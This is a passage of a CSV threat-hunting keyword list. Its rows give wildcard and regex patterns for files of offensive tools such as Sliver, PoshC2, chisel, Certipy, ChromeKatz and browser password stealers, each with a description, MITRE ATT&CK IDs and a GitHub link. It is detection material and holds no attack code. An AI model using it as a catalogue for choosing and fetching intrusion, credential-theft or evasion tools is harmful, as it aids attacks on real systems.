Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/C2-Tool-Collection/*",".{0,1000}\/C2\-Tool\-Collection\/.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*/cain.html*",".{0,1000}\/cain\.html.{0,1000}","offensive_tool_keyword","Cain&Abel","Cain & Able exploitation tool file ","T1075 - T1110 - T1071 - T1003 - T1555","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md","1","1","N/A","N/A","9","885","266","2023-09-28T15:38:54Z","2021-05-11T12:38:17Z" "*/CamHacker-*.png*",".{0,1000}\/CamHacker\-.{0,1000}\.png.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/CamHacker.git*",".{0,1000}\/CamHacker\.git.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/campaign/*/implant/get_all*",".{0,1000}\/campaign\/.{0,1000}\/implant\/get_all.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/canary.go",".{0,1000}\/canary\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/CandyPotato.cpp*",".{0,1000}\/CandyPotato\.cpp.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sdf*",".{0,1000}\/CandyPotato\.sdf.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.sln*",".{0,1000}\/CandyPotato\.sln.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CandyPotato.vcxproj*",".{0,1000}\/CandyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/CapBypass.ps1*",".{0,1000}\/CapBypass\.ps1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*/carlosevieira/Dirty-Pipe*",".{0,1000}\/carlosevieira\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*/cassandra-brute.nse*",".{0,1000}\/cassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cassandra-info.nse*",".{0,1000}\/cassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/catspin.git*",".{0,1000}\/catspin\.git.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/catspin-main/*",".{0,1000}\/catspin\-main\/.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*/cc2_frp.*",".{0,1000}\/cc2_frp\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/cccam-version.nse*",".{0,1000}\/cccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ccmpwn.git*",".{0,1000}\/ccmpwn\.git.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*/ccmpwn.py*",".{0,1000}\/ccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*/CCob/Volumiser*",".{0,1000}\/CCob\/Volumiser.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/CelestialSpark.git*",".{0,1000}\/CelestialSpark\.git.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" 
"*/cerbrutus*",".{0,1000}\/cerbrutus.{0,1000}","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","4","330","48","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" "*/Certipy.git*",".{0,1000}\/Certipy\.git.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*/Certipy/*",".{0,1000}\/Certipy\/.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "*/CertStealer*",".{0,1000}\/CertStealer.{0,1000}","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","464","69","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z" "*/certsync.git*",".{0,1000}\/certsync\.git.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","7","602","68","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z" "*/cfn__resource_injection_lambda*",".{0,1000}\/cfn__resource_injection_lambda.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon 
Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ChainBuilder.py*",".{0,1000}\/ChainBuilder\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/Chakra.dll*",".{0,1000}\/Chakra\.dll.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*/CHAOS.git*",".{0,1000}\/CHAOS\.git.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*/CHAOS-5.0.1.zip*",".{0,1000}\/CHAOS\-5\.0\.1\.zip.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" 
"*/chaos-container:/database/*",".{0,1000}\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","1","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*/charlotte.cpp*",".{0,1000}\/charlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/charlotte.py*",".{0,1000}\/charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*/CheckPort.exe*",".{0,1000}\/CheckPort\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/CheeseTools.git*",".{0,1000}\/CheeseTools\.git.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*/cheetah.git*",".{0,1000}\/cheetah\.git.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/cheetah.py*",".{0,1000}\/cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/Chimera.git*",".{0,1000}\/Chimera\.git.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/chimera.py*",".{0,1000}\/chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - 
T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*/chimera.sh*",".{0,1000}\/chimera\.sh.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/chisel.exe*",".{0,1000}\/chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel.git*",".{0,1000}\/chisel\.git.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel/client/*",".{0,1000}\/chisel\/client\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel/server/*",".{0,1000}\/chisel\/server\/.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel@latest*",".{0,1000}\/chisel\@latest.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP 
tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel_x32*",".{0,1000}\/chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/chisel_x64*",".{0,1000}\/chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*/chisel-darwin_amd64*",".{0,1000}\/chisel\-darwin_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-freebsd*",".{0,1000}\/chisel\-freebsd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*/chisel-linux_*",".{0,1000}\/chisel\-linux_.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-master*",".{0,1000}\/chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chisel-windows_amd6*",".{0,1000}\/chisel\-windows_amd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*/chrisk44/*",".{0,1000}\/chrisk44\/.{0,1000}","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2320","419","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" "*/chrome_decrypt.py*",".{0,1000}\/chrome_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/ChromeDump/*",".{0,1000}\/ChromeDump\/.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other resources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential 
Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/ChromeKatz.git*",".{0,1000}\/ChromeKatz\.git.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*/chromepasswordlist.csv*",".{0,1000}\/chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/chromepasswords.py*",".{0,1000}\/chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/chromium_based_browsers.py*",".{0,1000}\/chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*/chromium_history.py*",".{0,1000}\/chromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/chromium_logins.py*",".{0,1000}\/chromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/cics-enum.nse*",".{0,1000}\/cics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-info.nse*",".{0,1000}\/cics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-user-brute.nse*",".{0,1000}\/cics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/cics-user-enum.nse*",".{0,1000}\/cics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
